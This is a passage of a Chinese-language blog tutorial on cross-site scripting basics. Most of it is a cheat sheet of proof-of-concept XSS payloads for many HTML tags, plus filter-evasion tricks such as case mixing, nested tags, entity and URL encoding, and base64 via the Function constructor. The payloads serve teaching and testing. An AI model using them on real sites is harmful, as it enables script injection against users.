onmouseout=&quot;alert(&#x27;xss&#x27;);&quot;&gt;xss&lt;/button&gt;</span><br><span class="line">&lt;button onmouseup=&quot;alert(&#x27;xss&#x27;);&quot;&gt;xss&lt;/button&gt;</span><br><span class="line">&lt;button onmousedown=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/button&gt;</span><br></pre></td></tr></table></figure>

<h4 id="0x08-div标签"><a href="#0x08-div标签" class="headerlink" title="0x08. div标签"></a>0x08. div标签</h4><p>这个需要借助url编码来实现绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">原代码：</span><br><span class="line">&lt;div onmouseover=&#x27;alert(1)&#x27;&gt;DIV&lt;/div&gt;</span><br><span class="line">经过url编码：</span><br><span class="line">&lt;div onmouseover%3d&#x27;alert%26lpar%3b1%26rpar%3b&#x27;&gt;DIV&lt;%2fdiv&gt;</span><br></pre></td></tr></table></figure>

<h4 id="0x09"><a href="#0x09" class="headerlink" title="0x09. &lt;object标签"></a>0x09. &lt;object标签</h4><p>这个需要借助 data 伪协议和 base64 编码来实现绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;object data=&quot;data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=&quot;&gt;&lt;/object&gt;</span><br></pre></td></tr></table></figure>

<h4 id="0x10-script-标签"><a href="#0x10-script-标签" class="headerlink" title="0x10. script 标签"></a>0x10. script 标签</h4><p>(窝用过最多的)(doge)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(&#x27;xss&#x27;)&lt;/script&gt;</span><br><span class="line">&lt;script&gt;alert(/xss/)&lt;/script&gt;</span><br><span class="line">&lt;script&gt;alert(123)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<h4 id="0x11-p-标签"><a href="#0x11-p-标签" class="headerlink" title="0x11. p 标签"></a>0x11. p 标签</h4><p>(骗你的，窝也没用过)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;p onclick=&quot;alert(&#x27;xss&#x27;);&quot;&gt;xss&lt;/p&gt;</span><br><span class="line">&lt;p onmouseover=&quot;alert(&#x27;xss&#x27;);&quot;&gt;xss&lt;/p&gt;</span><br><span class="line">&lt;p onmouseout=&quot;alert(&#x27;xss&#x27;);&quot;&gt;xss&lt;/p&gt;</span><br><span class="line">&lt;p onmouseup=&quot;alert(&#x27;xss&#x27;);&quot;&gt;xss&lt;/p&gt;</span><br></pre></td></tr></table></figure>

<h4 id="0x12-input-标签"><a href="#0x12-input-标签" class="headerlink" title="0x12. input 标签"></a>0x12. input 标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;input onclick=&quot;alert(&#x27;xss&#x27;);&quot;&gt;</span><br><span class="line">&lt;input onfocus=&quot;alert(&#x27;xss&#x27;);&quot;&gt;</span><br><span class="line">&lt;input onfocus=&quot;alert(&#x27;xss&#x27;);&quot; autofocus=&quot;&quot;&gt;</span><br><span class="line">&lt;input onmouseover=&quot;alert(&#x27;xss&#x27;);&quot;&gt;</span><br><span class="line">&lt;input type=&quot;text&quot; onkeydown=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/input&gt;</span><br><span class="line">&lt;input type=&quot;text&quot; onkeypress=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/input&gt;</span><br><span class="line">&lt;input type=&quot;text&quot; onkeydown=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/input&gt;</span><br></pre></td></tr></table></figure>

<h4 id="0x13-details标签"><a href="#0x13-details标签" class="headerlink" title="0x13. details标签"></a>0x13. details标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;details ontoggle=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/details&gt;</span><br><span class="line">&lt;details ontoggle=&quot;alert(&#x27;xss&#x27;);&quot; open=&quot;&quot;&gt;&lt;/details&gt;</span><br></pre></td></tr></table></figure>

<h4 id="0x14"><a href="#0x14" class="headerlink" title="0x14. &lt;select 标签"></a>0x14. &lt;select 标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;select onfocus=&quot;alert(&#x27;xss&#x27;);&quot; autofocus&gt;&lt;/select&gt;</span><br><span class="line">&lt;select onmouseover=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/select&gt;</span><br><span class="line">&lt;select onclick=eval(&quot;alert(&#x27;xss&#x27;);&quot;)&gt;&lt;/select&gt;</span><br></pre></td></tr></table></figure>

<h4 id="0x15"><a href="#0x15" class="headerlink" title="0x15. &lt;form 标签"></a>0x15. &lt;form 标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;form method=&quot;x&quot; action=&quot;x&quot; onmouseover=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;input type=submit&gt;&lt;/form&gt; </span><br><span class="line">&lt;form method=&quot;x&quot; action=&quot;x&quot; onmouseout=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;input type=submit&gt;&lt;/form&gt; </span><br><span class="line">&lt;form method=&quot;x&quot; action=&quot;x&quot; onmouseup=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;input type=submit&gt;&lt;/form&gt;</span><br></pre></td></tr></table></figure>

<h4 id="0x16"><a href="#0x16" class="headerlink" title="0x16.  &lt;body标签"></a>0x16.  &lt;body标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;body onload=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/body&gt;</span><br></pre></td></tr></table></figure>



<h3 id="2-常用绕过姿势汇总"><a href="#2-常用绕过姿势汇总" class="headerlink" title="2.常用绕过姿势汇总"></a>2.常用绕过姿势汇总</h3><h4 id="1-关键词置空绕过"><a href="#1-关键词置空绕过" class="headerlink" title="1.关键词置空绕过"></a>1.关键词置空绕过</h4><p>注：置空指将关键词替换成空格，当过滤为其他字符时该方法不再适用，得考虑对字符做处理</p>
<h5 id="0x01-大小写绕过"><a href="#0x01-大小写绕过" class="headerlink" title="0x01. 大小写绕过"></a>0x01. 大小写绕过</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(/xss/)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>可以转换为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;ScRiPt&gt;AlErT(/xss/)&lt;/sCrIpT&gt;</span><br></pre></td></tr></table></figure>

<p>（当然有些时候会强制转换大小写，例如<code>raw=raw.lower()</code>，这样大小写绕过就不管用了QAQ）</p>
<h5 id="0x02-嵌套绕过"><a href="#0x02-嵌套绕过" class="headerlink" title="0x02. 嵌套绕过"></a>0x02. 嵌套绕过</h5><p>嵌套<script>和</script>突破</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(/xss/)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>可以转换为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;sc&lt;script&gt;ript&gt;alert(/xss/)&lt;/sc&lt;/script&gt;ript&gt;</span><br></pre></td></tr></table></figure>

<h4 id="2-编码绕过"><a href="#2-编码绕过" class="headerlink" title="2.编码绕过"></a>2.编码绕过</h4><p>我们已知浏览器对 XSS 代码的解析顺序为：<strong>HTML解码 —— URL解码 —— JS解码(只支持UNICODE)</strong></p>
<p>因此我们可以对此使用编码绕过。</p>
<h5 id="1-html-实体编码"><a href="#1-html-实体编码" class="headerlink" title="1. html 实体编码"></a>1. html 实体编码</h5><p><strong>当可控点为单个标签属性时，可以使用 html 实体编码。</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;可控点&quot;&gt;test&lt;/a&gt;</span><br><span class="line"></span><br><span class="line">&lt;iframe src=&quot;可控点&quot;&gt;test&lt;iframe&gt;</span><br><span class="line">&lt;img src=x onerror=&quot;可控点&quot;&gt;</span><br></pre></td></tr></table></figure>

<p><strong>Payload</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;javascript:alert(1)&quot;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<p><strong>十进制</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#49;&amp;#41;&quot;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<p><strong>十六进制</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x61;&amp;#x6c;&amp;#x65;&amp;#x72;&amp;#x74;&amp;#x28;&amp;#x31;&amp;#x29;&quot;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<p><strong>可以不带分号</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;&amp;#x6a&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3a&amp;#x61&amp;#x6c&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x31&amp;#x29&quot;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<p><strong>可以填充0</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;&amp;#x006a&amp;#x0061&amp;#x0076&amp;#x0061&amp;#x0073&amp;#x0063&amp;#x0072&amp;#x0069&amp;#x0070&amp;#x0074&amp;#x003a&amp;#x0061&amp;#x006c&amp;#x0065&amp;#x0072&amp;#x0074&amp;#x0028&amp;#x0031&amp;#x0029&quot;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure>



<h5 id="2-url-编码"><a href="#2-url-编码" class="headerlink" title="2. url 编码"></a>2. url 编码</h5><p><strong>当注入点存在 href 或者 src 属性时，可以使用 url 编码。</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;可控点&quot;&gt;test&lt;/a&gt;</span><br><span class="line"></span><br><span class="line">&lt;iframe src=&quot;可控点&quot;&gt;test&lt;/iframe&gt;</span><br></pre></td></tr></table></figure>

<p><strong>Payload</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;javascript:alert(1)&quot;&gt;test&lt;/a&gt;</span><br><span class="line"></span><br><span class="line">&lt;iframe src=&quot;javascript:alert(1)&quot;&gt;test&lt;/iframe&gt;</span><br></pre></td></tr></table></figure>

<p><strong>注：url 解析过程中，不能对协议类型进行任何的编码操作，所以 javascript: 协议头需要保留。</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;javascript:%61%6c%65%72%74%28%31%29&quot;&gt;test&lt;/a&gt;</span><br><span class="line"></span><br><span class="line">&lt;iframe src=&quot;javascript:%61%6c%65%72%74%28%31%29&quot;&gt;test&lt;/iframe&gt;</span><br></pre></td></tr></table></figure>

<p><strong>可以二次编码</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;javascript:%2561%256c%2565%2572%2574%2528%2531%2529&quot;&gt;test&lt;/a&gt;</span><br><span class="line"></span><br><span class="line">&lt;iframe src=&quot;javascript:%2561%256c%2565%2572%2574%2528%2531%2529&quot;&gt;test&lt;/iframe&gt;</span><br></pre></td></tr></table></figure>



<h5 id="3-js编码"><a href="#3-js编码" class="headerlink" title="3.js编码"></a>3.js编码</h5><p>先空着(doge)</p>
<h4 id="3-空格过滤绕过"><a href="#3-空格过滤绕过" class="headerlink" title="3.空格过滤绕过"></a>3.空格过滤绕过</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;&lt;img**AA**src**AA**onerror**BB**=**BB**alert**CC**(1)**DD**&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p>A位置可填充 &#x2F;，&#x2F;123&#x2F;，%09，%0A，%0C，%0D，%20 B位置可填充 %09，%0A，%0C，%0D，%20 C位置可填充 %0B，&#x2F;**&#x2F;，如果加了双引号，则可以填充 %09，%0A，%0C，%0D，%20 D位置可填充 %09，%0A，%0C，%0D，%20，&#x2F;&#x2F;，&gt;</p>
<h4 id="4-圆括号过滤绕过"><a href="#4-圆括号过滤绕过" class="headerlink" title="4.圆括号过滤绕过"></a>4.圆括号过滤绕过</h4><ol>
<li>反引号替换（比较常见），单引号过滤也可以用&#96; 绕过</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert`1`&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<ol start="2">
<li>throw 绕过(个人没用过)</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;video src onerror=&quot;javascript:window.onerror=alert;throw 1&quot;&gt;</span><br><span class="line">&lt;svg/onload=&quot;window.onerror=eval;throw&#x27;=alert\x281\x29&#x27;;&quot;&gt;</span><br></pre></td></tr></table></figure>



<h4 id="5-alert-过滤绕过"><a href="#5-alert-过滤绕过" class="headerlink" title="5.alert 过滤绕过"></a>5.alert 过滤绕过</h4><p>1.prompt 替换</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;prompt(/xss/)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>2.confirm 替换</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;confirm(/xss/)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>3.console.log 替换</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;console.log(3)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>4.document.write 替换</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;document.write(1)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<ol start="5">
<li>base64 绕过</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=x onerror=&quot;Function`a$&#123;atob`YWxlcnQoMSk=`&#125;```&quot;&gt;</span><br><span class="line">&lt;img src=x onerror=&quot;``.constructor.constructor`a$&#123;atob`YWxlcnQoMSk=`&#125;```&quot;&gt;</span><br></pre></td></tr></table></figure>



<h4 id="6-函数拼接绕过"><a href="#6-函数拼接绕过" class="headerlink" title="6.函数拼接绕过"></a>6.函数拼接绕过</h4><ol>
<li>eval</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;eval(&#x27;al&#x27;+&#x27;ert(1)&#x27;)&quot;&gt;</span><br></pre></td></tr></table></figure>

<ol start="2">
<li>top</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;top[&#x27;al&#x27;+&#x27;ert&#x27;](1)&quot;&gt;</span><br></pre></td></tr></table></figure>

<ol start="3">
<li>window</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;window[&#x27;al&#x27;+&#x27;ert&#x27;](1)&quot;&gt;</span><br></pre></td></tr></table></figure>

<ol start="4">
<li>self</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;self[`al`+`ert`](1)&quot;&gt;</span><br></pre></td></tr></table></figure>

<ol start="5">
<li>parent</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;parent[`al`+`ert`](1)&quot;&gt;</span><br></pre></td></tr></table></figure>

<ol start="6">
<li>frames</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;frames[`al`+`ert`](1)&quot;&gt;</span><br></pre></td></tr></table></figure>





<p>未来再补充</p>

    </div>
    <footer class="article-footer">
        <blockquote class="article-copyright">
    <p><strong><span class="icon-user icon"></span>Author: </strong>Cl1ck-t0</p>
    <p><strong><span class="icon-link icon"></span>Permalink: </strong><a href="https://cl1ck-t0.github.io/2025/11/23/xss%E5%9F%BA%E7%A1%80/">https://cl1ck-t0.github.io/2025/11/23/xss%E5%9F%BA%E7%A1%80/</a></p>
    
    <p><strong><span class="icon-calendar icon"></span>Published: </strong>2025-11-23 23:30:36</p>
    <p><strong><span class="icon-calendar icon"></span>Updated: </strong>2026-01-04 22:07:10</p>
    <p><strong><span class="icon-copyright icon"></span>License: </strong>All articles on this blog are licensed under the <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="noopener nofollow noreferrer" target="_blank"><span class="icon-creative-commons"></span>BY-NC-SA</a> license agreement unless otherwise stated. Please indicate the source when reprinting!</p>
    <span class="icon-creative-commons article-copyright-bg"></span>
  </blockquote>
        <div class="share-wrapper">
    <a href="https://service.weibo.com/share/share.php?url=https%3A%2F%2Fcl1ck-t0.github.io%2F2025%2F11%2F23%2Fxss%25E5%259F%25BA%25E7%25A1%2580%2F&amp;appkey=&amp;title=xss%E5%9F%BA%E7%A1%80&amp;pic=&amp;ralateUid=" target="_blank" rel="noopener noreferrer" title="xss基础">
      <div class="share-icon icon icon-weibo">
      </div>
    </a>
    <a href="https://connect.qq.com/widget/shareqq/index.html?url=www.baidu.com&amp;title=xss%E5%9F%BA%E7%A1%80&amp;desc=xss%E5%9F%BA%E7%A1%80&amp;source=https%3A%2F%2Fcl1ck-t0.github.io" target="_blank" rel="noopener noreferrer" title="xss基础">
      <div class="share-icon icon icon-qq">
      </div>
    </a>
    <a href="javascript:;"  title="xss基础">
      <div class="share-icon icon icon-weixin">
          <div id="share-weixin">
            <div class="share-weixin-dom">
              <div class="share-weixin-content">
                <img id="share-weixin-banner"> 
                <div id="share-weixin-title"></div>
                <div id="share-weixin-desc"></div>
              </div>
              <div class="share-weixin-qrcode">
                <div class="share-weixin-info">
                  <div id="share-weixin-author"></div>
                  <div id="share-weixin-theme">Powered By hexo-theme-reimu</div>
                </div>
                <img id="share-weixin-qr" >
              </div>
            </div>
            <div class="share-weixin-canvas"></div>
          </div>
      </div>
    </a>
</div>
      
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/%E5%9F%BA%E7%A1%80/" rel="tag" title="基础">基础</a></li></ul>

    </footer>
  </div>
    <nav id="article-nav" aria-label="Article navigation" data-aos="fade-up">
      <div class="article-nav-link-wrap left">
            <img data-src="/covers/castorice-honkai-3840x2160-22114.jpg" data-sizes="auto" alt="SQL注入基础" class="lazyload">
        <a href="/2025/12/29/SQL%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/" aria-label="Prev: SQL注入基础" title="Prev: SQL注入基础"></a>
        <div class="article-nav-caption">Prev</div>
        <h3 class="article-nav-title">
            SQL注入基础
        </h3>
      </div>
    <div class="article-nav-link-wrap right">
          <img data-src="/covers/evernight-honkai-3840x2160-24123.jpg" data-sizes="auto" alt="php伪协议" class="lazyload">
      <a href="/2025/11/16/php%E4%BC%AA%E5%8D%8F%E8%AE%AE/" aria-label="Next: php伪协议"  title="Next: php伪协议"></a>
      <div class="article-nav-caption">Next</div>
      <h3 class="article-nav-title">
          php伪协议
      </h3>
    </div>
  </nav>

</article>

  <section id="comments" data-aos="fade-up">
    <div class="comment-header">
        
      <h2 class="comment-title">Leave a comment</h2>
      <div class="comment-selector">
        <div class="comment-selector-wrap">
            <div class="selector-item" data-selector="utterances">
              <span>utterances</span>
            </div>
        </div>
      </div>
    </div>
    <div class="comment-content">
          <div class="comment utterances-comment" data-aos="fade-up"
            id="utterances-comment">
          </div>
    </div>
  </section>

</section>
        </div>
        <footer id="footer" aria-label="Site footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    <div>
      <span class="icon-copyright"></span>
        2020-2026
        &nbsp;
      Cl1ck-t0
    </div>
      <div>
        Powered by&nbsp;<a href="https://hexo.io/" rel="noopener nofollow noreferrer" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" rel="noopener nofollow noreferrer" target="_blank">Reimu</a>
      </div>
      <div>
        <span class="icon-brush"></span>
        15.3k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        01:12
      </div>
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">Number of visits&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">Number of visitors&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
  </div>
</footer>

          <div class="sidebar-top">
            <div class="sidebar-top-taichi rotate"></div>
            <div class="arrow-up"></div>
          </div>
        <div id="mask" class="hide"></div>
      </div>
      <nav id="mobile-nav" aria-label="Mobile navigation">
  <div class="sidebar-wrap">
        <div class="sidebar-toc-sidebar"><h3 class="toc-title">Contents</h3>
<div class="sidebar-toc-wrapper toc-div-class" >
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#xss%E5%9F%BA%E7%A1%80"><span class="toc-number">1.</span> <span class="toc-text">xss基础</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-xss%E6%A6%82%E8%BF%B0"><span class="toc-number">1.1.</span> <span class="toc-text">一.xss概述</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E5%AE%9A%E4%B9%89%EF%BC%9A"><span class="toc-number">1.1.1.</span> <span class="toc-text">1.定义：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-XSS%E5%B8%B8%E8%A7%81%E5%8D%B1%E5%AE%B3"><span class="toc-number">1.1.2.</span> <span class="toc-text">2.XSS常见危害</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-XSS%E6%A3%80%E6%B5%8B%E6%96%B9%E6%B3%95"><span class="toc-number">1.1.3.</span> <span class="toc-text">3.XSS检测方法</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#XSS%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81%E4%BD%8D%E7%BD%AE%EF%BC%9A%E5%8F%8D%E9%A6%88%E4%B8%8E%E6%B5%8F%E8%A7%88%E3%80%81%E5%AF%8C%E6%96%87%E6%9C%AC%E7%BC%96%E8%BE%91%E5%99%A8%E3%80%81%E5%90%84%E7%B1%BB%E6%A0%87%E7%AD%BE%E6%8F%92%E5%85%A5%E5%92%8C%E8%87%AA%E5%AE%9A%E4%B9%89%E3%80%81%E7%94%A8%E6%88%B7%E8%B5%84%E6%96%99%E3%80%81-%E5%85%B3%E9%94%AE%E8%AF%8D%E3%80%81%E8%AF%B4%E6%98%8E%E3%80%81%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%AD%89%E5%A4%84"><span class="toc-number">1.1.3.1.</span> <span class="toc-text">XSS漏洞常见位置：反馈与浏览、富文本编辑器、各类标签插入和自定义、用户资料、 关键词、说明、文件上传等处</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E5%88%86%E7%B1%BB"><span class="toc-number">1.2.</span> <span class="toc-text">二.分类</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E5%8F%8D%E5%B0%84%E5%9E%8Bxss"><span class="toc-number">1.2.1.</span> <span class="toc-text">1.反射型xss</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E5%AD%98%E5%82%A8%E5%9E%8Bxss"><span class="toc-number">1.2.2.</span> <span class="toc-text">2.存储型xss</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-DOM%E5%9E%8Bxss"><span class="toc-number">1.2.3.</span> <span class="toc-text">3.DOM型xss</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89-xss%E5%AE%9E%E6%88%98"><span class="toc-number">1.3.</span> <span class="toc-text">三.xss实战</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E5%B8%B8%E7%94%A8%E6%A0%87%E7%AD%BE"><span class="toc-number">1.3.1.</span> <span class="toc-text">1.常用标签</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#0x01-a-%E6%A0%87%E7%AD%BE"><span class="toc-number">1.3.1.1.</span> <span class="toc-text">0x01. a 标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x02-img%E6%A0%87%E7%AD%BE"><span class="toc-number">1.3.1.2.</span> <span class="toc-text">0x02. img标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x03-iframe%E6%A0%87%E7%AD%BE"><span class="toc-number">1.3.1.3.</span> <span class="toc-text">0x03. iframe标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x04"><span class="toc-number">1.3.1.4.</span> <span class="toc-text">0x04. &lt;audio 标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x05"><span class="toc-number">1.3.1.5.</span> <span class="toc-text">0x05. &lt;video标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x06"><span class="toc-number">1.3.1.6.</span> <span class="toc-text">0x06. &lt;svg标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x07-button-%E6%A0%87%E7%AD%BE"><span class="toc-number">1.3.1.7.</span> <span class="toc-text">0x07. button 标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x08-div%E6%A0%87%E7%AD%BE"><span class="toc-number">1.3.1.8.</span> <span class="toc-text">0x08. div标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x09"><span class="toc-number">1.3.1.9.</span> <span class="toc-text">0x09. &lt;object标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x10-script-%E6%A0%87%E7%AD%BE"><span class="toc-number">1.3.1.10.</span> <span class="toc-text">0x10. script 标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x11-p-%E6%A0%87%E7%AD%BE"><span class="toc-number">1.3.1.11.</span> <span class="toc-text">0x11. p 标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x12-input-%E6%A0%87%E7%AD%BE"><span class="toc-number">1.3.1.12.</span> <span class="toc-text">0x12. input 标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" 